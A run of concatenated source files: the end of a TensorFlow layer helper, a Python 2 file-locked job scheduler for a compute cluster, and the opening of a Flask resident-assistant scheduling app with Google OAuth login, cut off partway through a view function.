            bias_var = vs.get_variable("Bias", [output_size], dtype=dtype)
        else:
            bias_var = vs.get_variable(
                "Bias", [output_size], dtype=dtype,
                initializer=tf.constant_initializer(bias_start, dtype=dtype))
        return output + bias_var
|
# scheduler.py is used to submit, schedule, run jobs on the cluster.
import os,sys,fcntl,subprocess,random,traceback,errno
from time import sleep,time,ctime
import ujson
sys.path.append('/home/ben/code')
sys.path.append('/home/ben/file_transfer')
from manage_cluster import ManageCluster
from file_transfer import FileTransfer
from configs_parser import get_configs
# for running jobs submitted through the Scheduler
class Runner():
def __init__(self):
# configs
configs = get_configs(self.__module__)
self.local_working_dir = configs['local_working_dir']
# shared references
self.manage_cluster = ManageCluster()
self.manage_cluster.start_cluster()
self.file_transfer = FileTransfer()
self.scheduler = Scheduler()
self.finished_jobs = None
def run(self):
self.finished_jobs = set([])
while True:
job = self._get_next_job()
if job:
print 'STARTING JOB FROM SCHEDULER...'
start_time = time()
success,exception = self._run_job(job)
print 'FINISHED JOB FROM SCHEDULER...'
end_time = time()
self._mark_job_as_finished(job,success,exception,start_time,end_time)
else:
sleep(2)
def _get_next_job(self):
all_jobs = self.scheduler._get_jobs()
for job in all_jobs:
job_name = job['job_name']
force_run = job['force_run']
if force_run and job_name in self.finished_jobs:
self.finished_jobs.remove(job_name)
if job_name not in self.finished_jobs:
return job
self.finished_jobs = set([])
return False
def _run_job(self,job):
self._print_job(job)
self._write_current_job(job)
job_type = job['job_type']
if job_type == 'mapreduce':
success = self._run_mapreduce_job(job)
elif job_type == 'script':
success = self._run_script(job)
elif job_type == 'file_transfer':
success = self._run_file_transfer(job)
# note: success is a tuple.
return success
def _print_job(self,job):
print 'RUNNING JOB:'
for key in job:
val = job[key]
print '\t',key+':',val
print '---\n'
def _mark_job_as_finished(self,job,success,exception,start_time,end_time):
job_name = job['job_name']
self.finished_jobs.add(job_name)
self.scheduler._mark_job_as_finished(job,success,exception,start_time,end_time)
def _write_current_job(self,job):
fn = self.local_working_dir + '/CURRENT_JOB.data'
f = open(fn,'w')
s = ujson.dumps(job)
f.write(s)
f.close()
def _run_mapreduce_job(self,job):
# set job parameters and run
try:
self.manage_cluster.run(job)
exception = None
return (True,exception)
except:
exception = traceback.format_exc()
current_phase = self.manage_cluster.current_phase
print exception
return (False,(exception,current_phase))
def _run_script(self,job):
# get script parameters
script_location = job['script_location']
script_arguments = job['script_arguments']
if script_arguments:
script = ['python',script_location] + script_arguments
else:
script = ['python',script_location]
# run script
try:
val = subprocess.check_output(script,shell=False)
exception = None
return (True,exception)
except:
exception = traceback.format_exc()
print exception
return (False,exception)
def _run_file_transfer(self,job):
job_type = job['job_type']
job_name = job['job_name']
job_priority = job['job_priority']
# upload/download
input_dir = job['input_dir']
output_dir = job['output_dir']
transfer_type = job['transfer_type']
reload_files = job['reload_files']
delete_files = job['delete_files']
compress = job['compress']
# upload auxiliary
input_file_name = job['input_file_name']
auxiliary_data_name = job['auxiliary_data_name']
try:
if transfer_type == 'upload':
self.file_transfer.upload(input_dir,output_dir,reload_files)
elif transfer_type == 'upload_bulk':
self.file_transfer.upload_bulk(input_dir,output_dir,reload_files,compress)
elif transfer_type == 'download':
self.file_transfer.download(input_dir,output_dir,delete_files)
elif transfer_type == 'download_bulk':
self.file_transfer.download_bulk(input_dir,output_dir,delete_files)
elif transfer_type == 'upload_auxiliary':
self.file_transfer.upload_auxiliary(input_file_name,auxiliary_data_name)
elif transfer_type == 'delete':
self.file_transfer.delete_files(output_dir)
exception = None
return (True,exception)
except:
exception = traceback.format_exc()
print exception
return (False,exception)
# for controling workflow for the Runner
class Scheduler():
    """File-based job scheduler used by the Runner (Python 2 code).

    Jobs are stored one JSON object per line in
    <local_working_dir>/JOBS.data, ordered by 'job_priority' (highest
    first).  Every read/rewrite of the job file is serialised with an
    fcntl advisory lock on scheduler.lock and retried up to 100 times
    with a short random back-off.
    """
    def __init__(self):
        # configs
        configs = get_configs(self.__module__)
        self.local_working_dir = configs['local_working_dir']
        # NOTE(review): this stores the submitter's home directory path,
        # not a username -- confirm that is intentional.
        self.job_submitter = os.path.expanduser('~')
        # shared references
        # Open file handle used by _lock_scheduler/_unlock_scheduler.
        self.scheduler_token = None
    def submit_job(self,job):
        """Validate *job* and write it into JOBS.data.

        An existing job with the same 'job_name' is replaced; otherwise
        the job is appended.  The whole job file is rewritten while the
        scheduler lock is held.
        """
        job_name = job['job_name']
        print 'ATTEMPTING:',job_name
        if self._is_correctly_specified(job):
            new_jobs = []
            existing_jobs = self._get_jobs()
            job_name = job['job_name']
            # Keep every job except any older version of this one.
            for existing_job in existing_jobs:
                existing_job_name = existing_job['job_name']
                if existing_job_name != job_name:
                    new_jobs.append(existing_job)
                else:
                    print 'FOUND EXISTING JOB/OVERWRITING:'
                    for key in existing_job:
                        print '\t',key,existing_job[key]
            # The submitted job is appended exactly once, whether or not an
            # older version was dropped above.
            new_jobs.append(job)
            attempts = 0
            while attempts < 100:
                if self._lock_scheduler():
                    fn = self.local_working_dir +'/JOBS.data'
                    f = open(fn,'w')
                    # NOTE(review): loop variable shadows the 'job' parameter.
                    for job in new_jobs:
                        s = ujson.dumps(job)
                        f.write(s+'\n')
                    f.close()
                    self._unlock_scheduler()
                    print 'ACCEPTED:',job_name
                    break
                else:
                    attempts = attempts + 1
                    sleep(random.uniform(0.05,0.10))
        else:
            print 'JOB MISSPECIFIED/JOB REJECTED:'
            for key in job:
                print '\t',key,job[key]
            print '---\n'
    def _is_correctly_specified(self,job):
        """Return True when *job* exactly matches its type's template and
        all required fields for that job type are populated."""
        correct = True
        job_priority = job['job_priority']
        # Priority 0 is valid, hence the explicit == 0 check.
        if job_priority or job_priority == 0:
            job_type = job['job_type']
            if job_type == 'mapreduce':
                job_template = self.get_mapreduce_job_template()
                template_keys = set(job_template.keys())
                job_keys = set(job.keys())
                if template_keys != job_keys:
                    print 'JOB NOT CREATED WITH TEMPLATE...'
                    correct = False
                    # Early return: missing keys below would raise KeyError.
                    return correct
                # required
                job_name = job['job_name']
                project_name = job['project_name']
                input_dirs = job['input_dirs']
                max_number_dumped_items_shuffler = job['max_number_dumped_items_shuffler']
                simultaneous_files_in_redis = job['simultaneous_files_in_redis']
                reduce_function_name = job['reduce_function_name']
                max_number_dumped_items_reducer = job['max_number_dumped_items_reducer']
                if not job_name:
                    print 'MISSING JOB NAME...'
                    correct = False
                if not project_name:
                    print 'MISSING PROJECT NAME...'
                    correct = False
                if not input_dirs:
                    print 'MISSING INPUT DIRS...'
                    correct = False
                if not max_number_dumped_items_shuffler:
                    print 'MISSING MAX NUMBER DUMPED ITEMS SHUFFLER...'
                    correct = False
                if not simultaneous_files_in_redis:
                    print 'MISSING SIMULTANEOUS FILES IN REDIS...'
                    correct = False
                if not reduce_function_name:
                    print 'MISSING REDUCE FUNCTION NAME...'
                    correct = False
                if not max_number_dumped_items_reducer:
                    print 'MISSING MAX NUMBER DUMPED ITEMS REDUCER...'
                    correct = False
            elif job_type == 'script':
                job_template = self.get_script_template()
                template_keys = set(job_template.keys())
                job_keys = set(job.keys())
                if template_keys != job_keys:
                    print 'JOB NOT CREATED WITH TEMPLATE...'
                    correct = False
                    return correct
                # required
                job_name = job['job_name']
                script_location = job['script_location']
                if not job_name:
                    print 'MISSING JOB NAME...'
                    correct = False
                if not script_location:
                    print 'MISSING SCRIPT LOCATION...'
                    correct = False
            elif job_type == 'file_transfer':
                job_template = self.get_file_transfer_template()
                template_keys = set(job_template.keys())
                job_keys = set(job.keys())
                if template_keys != job_keys:
                    print 'JOB NOT CREATED WITH TEMPLATE...'
                    correct = False
                    return correct
                # required
                job_name = job['job_name']
                if not job_name:
                    print 'MISSING JOB NAME...'
                    correct = False
                transfer_type = job['transfer_type']
                # Each transfer type has its own required fields.
                if transfer_type == 'upload' or transfer_type == 'download':
                    # upload/download
                    input_dir = job['input_dir']
                    output_dir = job['output_dir']
                    if not input_dir:
                        print 'MISSING INPUT DIRS...'
                        correct = False
                    if not output_dir:
                        print 'MISSING OUTPUT DIR...'
                        correct = False
                if transfer_type == 'upload_auxiliary':
                    # upload auxiliary
                    input_file_name = job['input_file_name']
                    auxiliary_data_name = job['auxiliary_data_name']
                    if not input_file_name:
                        print 'MISSING INPUT FILE NAME...'
                        correct = False
                    if not auxiliary_data_name:
                        print 'MISSING AUXILIARY DATA NAME...'
                        correct = False
                if transfer_type == 'delete':
                    output_dir = job['output_dir']
                    if not output_dir:
                        print 'MISSING OUTPUT DIR...'
                        correct = False
            else:
                print 'MISSING JOB TYPE...'
                correct = False
        else:
            print 'MISSING JOB PRIORITY...'
            correct = False
        return correct
    def delete_job(self,job_name):
        """Remove the job named *job_name* from JOBS.data (if present)
        and rewrite the file under the scheduler lock."""
        new_jobs = []
        existing_jobs = self._get_jobs()
        for existing_job in existing_jobs:
            existing_job_name = existing_job['job_name']
            if existing_job_name != job_name:
                new_jobs.append(existing_job)
            else:
                print 'FOUND JOB/DELETING:'
                for key in existing_job:
                    print '\t',key,existing_job[key]
                print '---\n'
        attempts = 0
        while attempts < 100:
            if self._lock_scheduler():
                fn = self.local_working_dir +'/JOBS.data'
                f = open(fn,'w')
                for job in new_jobs:
                    s = ujson.dumps(job)
                    f.write(s+'\n')
                f.close()
                self._unlock_scheduler()
                break
            else:
                attempts = attempts + 1
                sleep(random.uniform(0.05,0.10))
    def _delete_group(self,job_name):
        """Delete every job sharing *job_name*'s 'group_name'."""
        target_job = self._get_job(job_name)
        if target_job:
            target_group_name = target_job['group_name']
            existing_jobs = self._get_jobs()
            for existing_job in existing_jobs:
                existing_group_name = existing_job['group_name']
                if existing_group_name == target_group_name:
                    existing_job_name = existing_job['job_name']
                    self.delete_job(existing_job_name)
        else:
            print 'NO GROUP FOUND FOR JOB:',job_name
    def _get_job(self,job_name):
        """Return the job dict named *job_name*, or None (implicitly)."""
        existing_jobs = self._get_jobs()
        for existing_job in existing_jobs:
            existing_job_name = existing_job['job_name']
            if existing_job_name == job_name:
                return existing_job
    def _get_jobs(self):
        """Read JOBS.data under the lock and return the jobs sorted by
        descending 'job_priority'."""
        jobs = []
        fn = self.local_working_dir +'/JOBS.data'
        # Create an empty job file on first use.
        if not os.path.exists(fn):
            f = open(fn,'w')
            f.close()
        temp = []
        attempts = 0
        while attempts < 100:
            if self._lock_scheduler():
                f = open(fn)
                for l in f:
                    job = ujson.loads(l)
                    job_priority = job['job_priority']
                    temp.append((job_priority,job))
                f.close()
                self._unlock_scheduler()
                break
            else:
                attempts = attempts + 1
                sleep(random.uniform(0.05,0.10))
        # NOTE(review): ties on priority fall back to comparing the job
        # dicts themselves (Python 2 allows this) -- order is arbitrary.
        temp.sort(reverse=True)
        for _,job in temp:
            jobs.append(job)
        return jobs
    def _current_job(self):
        """Pretty-print the job recorded in CURRENT_JOB.data."""
        current_job = self._read_current_job()
        for key in current_job:
            val = current_job[key]
            print key+':',val
    def _read_current_job(self):
        """Load and return the job dict from CURRENT_JOB.data."""
        fn = self.local_working_dir + '/CURRENT_JOB.data'
        f = open(fn)
        s = f.read()
        f.close()
        job = ujson.loads(s)
        return job
    def _mark_job_as_finished(self,current_job,success,exception,start_time,end_time):
        """Append *current_job* to JOBS_SUCCESS.data or JOBS_FAILED.data.

        On success the runtime history is updated and run-once jobs are
        removed; on failure the job's whole group is deleted.
        """
        current_job_name = current_job['job_name']
        if success:
            print 'SUCCESS:',current_job_name
            fn = self.local_working_dir + '/JOBS_SUCCESS.data'
            self._update_runtime(current_job_name,start_time,end_time)
            run_once = current_job['run_once']
            if run_once:
                self.delete_job(current_job_name)
        else:
            fn = self.local_working_dir + '/JOBS_FAILED.data'
            # A failure takes down every job in the same group.
            self._delete_group(current_job_name)
        current_job['exception'] = exception
        f = open(fn,'a')
        s = ujson.dumps(current_job)
        f.write(s+'\n')
        f.close()
    def _update_runtime(self,job_name,start_time,end_time):
        """Record end_time - start_time (seconds) for *job_name* in
        JOBS_RUNTIME.data, keeping at most 50 samples per job."""
        runtime = int(end_time - start_time)
        fn = self.local_working_dir + '/JOBS_RUNTIME.data'
        if not os.path.exists(fn):
            runtimes = {}
            s = ujson.dumps(runtimes)
            f = open(fn,'w')
            f.write(s)
            f.close()
        else:
            f = open(fn)
            s = f.read()
            f.close()
            runtimes = ujson.loads(s)
        if job_name in runtimes:
            runtimes[job_name].append(runtime)
            # Shuffle then truncate: keeps a random 50-sample subset so the
            # history file stays bounded.
            random.shuffle(runtimes[job_name])
            runtimes[job_name] = runtimes[job_name][0:50]
        else:
            runtimes[job_name] = [runtime]
        s = ujson.dumps(runtimes)
        f = open(fn,'w')
        f.write(s)
        f.close()
    def get_mapreduce_job_template(self):
        """Return a blank mapreduce job dict; callers fill in the Nones."""
        job = {}
        # job/project
        job['job_submitter'] = self.job_submitter
        job['job_type'] = 'mapreduce'
        job['force_run'] = False
        job['start_time'] = None
        job['end_time'] = None
        job['project_name'] = None
        job['job_name'] = None
        job['group_name'] = None
        job['job_priority'] = None
        job['input_dirs'] = None
        job['delete_job_data'] = True
        job['run_once'] = False
        job['exception'] = None
        job['current_phase'] = None
        # mapper
        job['map_function_name'] = None
        job['auxiliary_data_name_mapper'] = None
        job['hold_state'] = False
        job['downsample'] = 1.0
        # shuffler
        job['max_number_dumped_items_shuffler'] = None # was 500000
        job['simultaneous_files_in_redis'] = None # was 10
        # reducer
        job['reduce_function_name'] = None
        job['auxiliary_data_name_reducer'] = None
        job['max_number_dumped_items_reducer'] = None
        job['disk_based_input'] = False
        job['disk_based_output'] = False
        job['compress'] = False
        return job
    def get_script_template(self):
        """Return a blank script job dict; callers fill in the Nones."""
        job = {}
        # job/project
        job['job_submitter'] = self.job_submitter
        job['job_type'] = 'script'
        job['force_run'] = False
        job['start_time'] = None
        job['end_time'] = None
        job['job_name'] = None
        job['group_name'] = None
        job['job_priority'] = None
        job['run_once'] = False
        job['exception'] = None
        # script
        job['script_location'] = None
        job['script_arguments'] = None
        return job
    def get_file_transfer_template(self):
        """Return a blank file-transfer job dict; callers fill in the Nones."""
        job = {}
        # job/project
        job['job_submitter'] = self.job_submitter
        job['job_type'] = 'file_transfer'
        job['force_run'] = False
        job['start_time'] = None
        job['end_time'] = None
        job['job_name'] = None
        job['group_name'] = None
        job['job_priority'] = None
        # NOTE(review): 'job_exception' looks redundant with 'exception'
        # below -- confirm both keys are really needed by consumers.
        job['job_exception'] = None
        job['run_once'] = False
        job['exception'] = None
        # upload/download
        job['input_dir'] = None
        job['output_dir'] = None
        job['transfer_type'] = None
        job['reload_files'] = True
        job['delete_files'] = True
        job['compress'] = False
        # auxiliary_upload
        job['input_file_name'] = None
        job['auxiliary_data_name'] = None
        return job
    def _lock_scheduler(self):
        """Try to take the non-blocking exclusive lock; return True/False.

        Re-raises any IOError other than EAGAIN (lock already held).
        """
        scheduler_token = self.local_working_dir+'/scheduler.lock'
        self.scheduler_token = open(scheduler_token,'a')
        try:
            fcntl.flock(self.scheduler_token, fcntl.LOCK_EX | fcntl.LOCK_NB)
            return True
        except IOError as e:
            if e.errno != errno.EAGAIN:
                raise
            else:
                return False
    def _unlock_scheduler(self):
        """Release the lock taken by _lock_scheduler and close the handle."""
        fcntl.flock(self.scheduler_token, fcntl.LOCK_UN)
        self.scheduler_token.close()
    # Dead code retained below as an inert string literal (unused at runtime).
    ''' def _mean(self,numbers):
        s = sum(numbers)
        l = len(numbers)
        mean = int(s/l)
        return mean
    def estimate_next_runtime(self,job_name):
        fn = self.local_working_dir + '/JOBS_RUNTIME.data'
        f = open(fn)
        s = f.read()
        f.close()
        runtimes = ujson.loads(s)
        current_job = self._read_current_job()
        current_job_name = current_job['job_name']
        if current_job_name == job_name:
            print 'JOB IS CURRENTLY RUNNING:',job_name
            return
        index = 0
        job_name_exists = False
        existing_jobs = self._get_jobs()
        for existing_job in existing_jobs:
            existing_job_name = existing_job['job_name']
            if existing_job_name == current_job_name:
                start_index = index
            elif existing_job_name == job_name:
                end_index = index
                job_name_exists = True
            index = index + 1
        if job_name_exists:
            is_current_job = True
            current_time = time()
            estimated_next_runtime = current_time
            if start_index < end_index:
                for index in xrange(start_index,end_index):
                    existing_job = existing_jobs[index]
                    existing_job_name = existing_job['job_name']
                    try:
                        estimated_job_runtime = self._mean(runtimes[existing_job_name])
                        if is_current_job:
                            estimated_next_runtime = estimated_next_runtime + 0.5*estimated_job_runtime
                            is_current_job = False
                        else:
                            estimated_next_runtime = estimated_next_runtime + estimated_job_runtime
                    except KeyError:
                        print 'NOT ENOUGH DATA TO CALCULATE AN ESTIMATE'
                        return
            else:
                l = len(existing_jobs)
                for index in xrange(start_index,l):
                    existing_job = existing_jobs[index]
                    existing_job_name = existing_job['job_name']
                    try:
                        estimated_job_runtime = self._mean(runtimes[existing_job_name])
                        if is_current_job:
                            estimated_next_runtime = estimated_next_runtime + 0.5*estimated_job_runtime
                            is_current_job = False
                        else:
                            estimated_next_runtime = estimated_next_runtime + estimated_job_runtime
                    except KeyError:
                        print 'NOT ENOUGH DATA TO CALCULATE AN ESTIMATE'
                        return
                for index in xrange(0,end_index):
                    existing_job = existing_jobs[index]
                    existing_job_name = existing_job['job_name']
                    try:
                        estimated_job_runtime = self._mean(runtimes[existing_job_name])
                        estimated_next_runtime = estimated_next_runtime + estimated_job_runtime
                    except KeyError:
                        print 'NOT ENOUGH DATA TO CALCULATE AN ESTIMATE'
                        return
            seconds_until_next_run = int(estimated_next_runtime - current_time)
            current_time_string = ctime(current_time)
            estimated_next_runtime_string = ctime(estimated_next_runtime)
            print 'CURRENT TIME:',current_time_string
            print 'ESTIMATED NEXT RUNTIME:',estimated_next_runtime_string
            print 'SECONDS UNTIL NEXT RUN:',seconds_until_next_run
            print 'JOB YET TO RUN:'
            if start_index < end_index:
                for index in xrange(start_index,end_index):
                    existing_job = existing_jobs[index]
                    existing_job_name = existing_job['job_name']
                    estimated_job_runtime = int(self._mean(runtimes[existing_job_name]))
                    print '\t',existing_job_name,estimated_job_runtime,'seconds...'
                print '---\n'
            else:
                l = len(existing_jobs)
                for index in xrange(start_index,l):
                    existing_job = existing_jobs[index]
                    existing_job_name = existing_job['job_name']
                    estimated_job_runtime = int(self._mean(runtimes[existing_job_name]))
                    print '\t',existing_job_name,estimated_job_runtime,'seconds...'
                for index in xrange(0,end_index):
                    existing_job = existing_jobs[index]
                    existing_job_name = existing_job['job_name']
                    estimated_job_runtime = int(self._mean(runtimes[existing_job_name]))
                    print '\t',existing_job_name,estimated_job_runtime,'seconds...'
                print '---\n'
        else:
            print 'JOB DOES NOT EXIST:',job_name'''
|
<filename>scheduleServer.py
from flask_login import UserMixin, current_user, LoginManager, login_required, login_user, logout_user
from flask import Flask, render_template, request, jsonify, redirect, url_for
from flask_dance.consumer.backend.sqla import OAuthConsumerMixin, SQLAlchemyBackend
from flask_dance.contrib.google import make_google_blueprint
from flask_dance.consumer import oauth_authorized
from gCalIntegration import gCalIntegratinator
from sqlalchemy.orm.exc import NoResultFound
from flask_sqlalchemy import SQLAlchemy
from flask_bootstrap import Bootstrap
from logging.config import dictConfig
from ra_sched import RA
from io import BytesIO
import scheduler4_0
import copy as cp
import datetime
import psycopg2
import calendar
import logging
import pickle
import os
# Configure the logger immediately per Flask recommendation
# Get the logging level from the environment
logLevel = os.environ["LOG_LEVEL"].upper()
dictConfig({
    'version': 1, # logging module specific-- DO NOT CHANGE
    'formatters': {'default': {
        'format': '[%(asctime)s.%(msecs)d] %(levelname)s in %(module)s: %(message)s',
        'datefmt': '%Y-%m-%d %H:%M:%S',
    }},
    'handlers': {'wsgi': {
        'class': 'logging.StreamHandler',
        'stream': 'ext://flask.logging.wsgi_errors_stream',
        'formatter': 'default'
    }},
    'root': {
        'level': logLevel,
        'handlers': ['wsgi']
    }
})
HOST_URL = os.environ["HOST_URL"]
app = Flask(__name__)
app.config['TEMPLATES_AUTO_RELOAD'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ["DATABASE_URL"]
Bootstrap(app)
# Setup for flask_dance with oauth
app.secret_key = os.environ["SECRET_KEY"]
gBlueprint = make_google_blueprint(
    client_id=os.environ["CLIENT_ID"],
    client_secret=os.environ["CLIENT_SECRET"],
    scope=["profile", "email"],
    redirect_to="index"
)
app.register_blueprint(gBlueprint, url_prefix="/login")
# Establish DB connection
# NOTE(review): a single module-level psycopg2 connection is shared by all
# request handlers -- confirm the WSGI server runs single-threaded, as
# psycopg2 connections are not safe for concurrent cursor use.
conn = psycopg2.connect(os.environ["DATABASE_URL"])
# Set up baseOpts to be sent to each HTML template
baseOpts = {
    "HOST_URL": os.environ["HOST_URL"]
}
# Instantiate gCalIntegratinator
gCalInterface = gCalIntegratinator()
# File-upload restrictions (see fileAllowed below)
ALLOWED_EXTENSIONS = {'txt','csv'}
UPLOAD_FOLDER = "./static"
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
db = SQLAlchemy(app) # SQLAlchemy is used for OAuth
login_manager = LoginManager() # The login manager for the application
login_manager.init_app(app)
class User(UserMixin,db.Model): # Contains information about the user
    """Flask-Login user record linking a Google account to an RA row."""
    id = db.Column(db.Integer, primary_key=True)
    # Google account email (see googleLoggedIn)
    username = db.Column(db.String(250), unique=True)
    # Foreign reference to the ra table (looked up by email at first login)
    ra_id = db.Column(db.Integer, unique=True)
class OAuth(OAuthConsumerMixin,db.Model): # Contains information about OAuth tokens
    """OAuth token storage; columns for id/provider/token come from
    OAuthConsumerMixin."""
    # Google user id ("id" field of the userinfo response), stored as text
    provider_user_id = db.Column(db.String(256), unique=True)
    user_id = db.Column(db.Integer, db.ForeignKey(User.id)) # This links the tokens to the user
    user = db.relationship(User)
# The following creates the backend for flask_dance which associates users to OAuth tokens
# user_required is set to False because of issues when users would first arrive to the
# application before being authorized by Google and flask_dance would not be able to look
# them up since they were not already authorized. By setting it to False, the app does not
# require a user to already exist in our database to continue.
gBlueprint.backend = SQLAlchemyBackend(OAuth, db.session, user=current_user, user_required=False)
# Format date and time information for calendar
ct = datetime.datetime.now()
# Next-month number in 1..12. The previous expression, (ct.month+1)%12,
# produced 0 for November (calendar.month_name[0] is the empty string);
# ct.month % 12 + 1 correctly maps 11 -> 12 and 12 -> 1.
nextMonthNum = ct.month % 12 + 1
# The next month falls in the following year only when the current month is
# December (the old check "ct.month <= 12" was always true, so the year
# never rolled over).
fDict = {"text_month": calendar.month_name[nextMonthNum],
         "num_month": nextMonthNum,
         "year": (ct.year + 1 if ct.month == 12 else ct.year)}
cDict = {"text_month":calendar.month_name[ct.month], "num_month":ct.month, "year":ct.year}
cc = calendar.Calendar(6) #format calendar so Sunday starts the week
# -- OAuth Decorators --
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login hook: resolve a session user id to a User row."""
    uid = int(user_id)
    return User.query.get(uid)
@app.before_request
def before_request():
    """Permanently redirect any plain-HTTP request to its HTTPS equivalent."""
    if request.url.startswith('http://'):
        secure_url = request.url.replace('http://', 'https://', 1)
        return redirect(secure_url, code=301)
@oauth_authorized.connect_via(gBlueprint)
def googleLoggedIn(blueprint,token):
    """Flask-Dance signal handler fired after Google authorizes a login.

    Looks up (or creates) the OAuth token record and its associated User,
    then logs the user in.  Always returns False so flask_dance does not
    try to store the token itself.
    """
    logging.info('googleLoggedIn')
    if not token:                                   # If we don't have a token
        return False
    resp = blueprint.session.get("/oauth2/v2/userinfo")
    if not resp.ok:                                 # If the response is bad
        logging.info("NOT OK")
        return False
    google_info = resp.json()
    username = google_info["email"]
    gID = str(google_info["id"])
    # Query to find the OAuth token in our database
    query = OAuth.query.filter_by(provider=blueprint.name,
                                  provider_user_id=gID)
    try:
        oauth = query.one()                         # Execute the query
    except NoResultFound:                           # If there are no results
        logging.info("NO OAUTH")
        oauth = OAuth(provider=blueprint.name,      # Create a new entry in our database
                      provider_user_id=gID,
                      token=token)
    if oauth.user:                                  # If we have a user
        logging.info("LOGGING OAUTH")
        login_user(oauth.user)                      # Log them in
    else:
        logging.info("CREATE NEW USER")
        cur = conn.cursor()
        # Parameterized query: the email comes from an external service and
        # must never be interpolated into the SQL string (SQL injection).
        cur.execute("SELECT id FROM ra WHERE email = %s", (username,))
        row = cur.fetchone()
        cur.close()
        # fetchone() returns a 1-tuple (or None); store the bare integer id
        # in the Integer ra_id column, not the tuple itself.
        raId = row[0] if row is not None else None
        user = User(username=username, ra_id=raId)  # Create a new user in the database
        oauth.user = user                           # Associate it with the OAuth token
        db.session.add_all([user, oauth])
        db.session.commit()                         # Commit changes
        login_user(user)                            # Login user
    # Function should return False so that flask_dance won't try to store the token itself
    return False
# -- Helper Functions --
def getAuth():
    """Return a dict describing the currently logged-in user.

    Keys: uEmail, ra_id, name, hall_id, auth_level, hall_name.
    If the email is unknown, returns a redirect response to the error
    page instead of a dict (callers must type-check the result).
    """
    logging.debug("Start getAuth")
    uEmail = current_user.username  # The email returned from Google
    cur = conn.cursor()
    # Parameterized query (was built with str.format() -- SQL injection risk)
    cur.execute("""
        SELECT ra.id, username, first_name, last_name, hall_id, auth_level, res_hall.name
        FROM "user" JOIN ra ON ("user".ra_id = ra.id)
                    JOIN res_hall ON (ra.hall_id = res_hall.id)
        WHERE username = %s;""", (uEmail,))
    res = cur.fetchone()  # Get user info from the database
    cur.close()
    if res is None:  # If user does not exist, go to error url
        logging.warning("No user found with email: {}".format(uEmail))
        return redirect(url_for(".err", msg="No user found with email: {}".format(uEmail)))
    return {"uEmail": uEmail, "ra_id": res[0], "name": res[2] + " " + res[3],
            "hall_id": res[4], "auth_level": res[5], "hall_name": res[6]}
def stdRet(status, msg):
    """Build the standard client-facing return object.

    Used when no additional payload needs to accompany a status/message
    pair going back to the browser.
    """
    logging.debug("Generate Standard Return")
    ret = dict(status=status, msg=msg)
    return ret
def fileAllowed(filename):
    """Return True when *filename* has an extension in ALLOWED_EXTENSIONS."""
    logging.debug("Checking if file is allowed")
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
    return extension in ALLOWED_EXTENSIONS
def validateUpload(partList):
    """Sanitize and validate one row of an uploaded RA roster file.

    partList -- the 6 raw fields: first name, last name, email,
                start date (M/D/Y), color (#rrggbb), role.
    Returns (sanitizedParts, valid, reasons) where *reasons* lists a
    human-readable string for every failed check.
    """
    logging.debug("Validating Upload")
    pl = []
    for i in partList:
        # str.replace returns a new string; the previous code discarded the
        # results, so the '%', ';' and '\\' characters were never stripped.
        pl.append(i.replace("%", "").replace(";", "").replace("\\", ""))
    valid = True
    reasons = []
    if len(partList) != 6:
        valid = False
        # Message now matches the actual expected field count (was "5").
        reasons.append("Expected 6 Parameters, Received: {}".format(len(partList)))
        logging.debug("PartList: "+str(partList))
    else:
        fName, lName, email, start, color, role = pl
        # Check Email Address: a plausible address needs BOTH an '@' and a
        # '.' (the previous "and" only rejected addresses missing both).
        if "@" not in email or "." not in email:
            valid = False
            reasons.append(fName+" "+lName+" - Invalid Email Address: "+email)
            logging.debug("RA Email: "+email)
        # Check Start Date
        splitDate = start.split("/")
        if len(splitDate) != 3 or "-" in start or int(splitDate[0]) > 12 or \
                int(splitDate[1]) > 31 or int(splitDate[2]) < 1:
            valid = False
            reasons.append(fName+" "+lName+" - Invalid Start Date: "+start)
            logging.debug("RA Start Date: "+start)
        # Check Color
        if len(color) != 7:
            valid = False
            reasons.append(fName+" "+lName+" - Invalid Color Format: {} Must be in 6-digit, hex format preceeded by a '#'".format(color))
            logging.debug("RA Color: "+color)
    return pl, valid, reasons
def getSchoolYear(month, year):
    """Return (start, end) ISO date strings for the school year containing
    the given month/year.

    A school year runs August 1 through July 31: August or later means the
    given year starts the school year, otherwise it ends it.
    """
    logging.debug("Calculate School Year: {} {}".format(month, year))
    yr = int(year)
    if int(month) >= 8:
        # August onward: this calendar year opens the school year
        startYear, endYear = yr, yr + 1
    else:
        # January-July: this calendar year closes the school year
        startYear, endYear = yr - 1, yr
    # TODO: Currently, a school year is considered from August to August.
    #       Perhaps this should be configurable by the AHD/HDs?
    start = "{}-08-01".format(startYear)
    end = "{}-07-31".format(endYear)
    logging.debug("Start: "+ start)
    logging.debug("End: "+ end)
    return start, end
def getCurSchoolYear():
    """Return (start, end) date strings for the current school year."""
    logging.debug("Calculate Current School Year")
    today = datetime.date.today()
    return getSchoolYear(today.month, today.year)
def formatDateStr(day, month, year, format="YYYY-MM-DD", divider="-"):
    """Assemble a date string following *format*.

    The format is split on *divider*; each token containing a "Y", "M" or
    "D" (case-insensitive) is replaced by the year, zero-padded month, or
    zero-padded day respectively.
    """
    # Zero-pad day and month to two digits
    dayStr = "0" + str(day) if day < 10 else str(day)
    monthStr = "0" + str(month) if month < 10 else str(month)
    # Map each format token to its value, then rejoin with the divider
    pieces = []
    for token in format.split(divider):
        tok = token.upper()
        if "Y" in tok:
            pieces.append(str(year))
        elif "M" in tok:
            pieces.append(monthStr)
        elif "D" in tok:
            pieces.append(dayStr)
        else:
            # Unrecognized token contributes nothing but keeps its divider
            pieces.append("")
    return divider.join(pieces)
# -- Views --
@app.route("/logout")
@login_required
def logout():
    """Log the current user out and send them back to the login page."""
    logging.info("Logout User")
    logout_user()
    destination = url_for('.login')
    return redirect(destination)
@app.route("/")
def login():
    """Entry point: hand the visitor off to the Google OAuth login flow."""
    logging.info("Redirect to Google Login")
    googleLogin = url_for("google.login")
    return redirect(googleLogin)
@app.route("/home")
@login_required
def index():
    """Render the main calendar page for the logged-in user."""
    userDict = getAuth()  # Get the user's info from our database
    if type(userDict) != dict:
        # getAuth() returned a redirect response instead of user info
        return userDict
    return render_template(
        "index.html",
        auth_level=userDict["auth_level"],
        curView=1,
        opts=baseOpts,
        hall_name=userDict["hall_name"],
    )
@app.route("/conflicts")
@login_required
def conflicts():
    """Render the conflict-entry page for the logged-in user.

    @login_required was missing here although every sibling view has it;
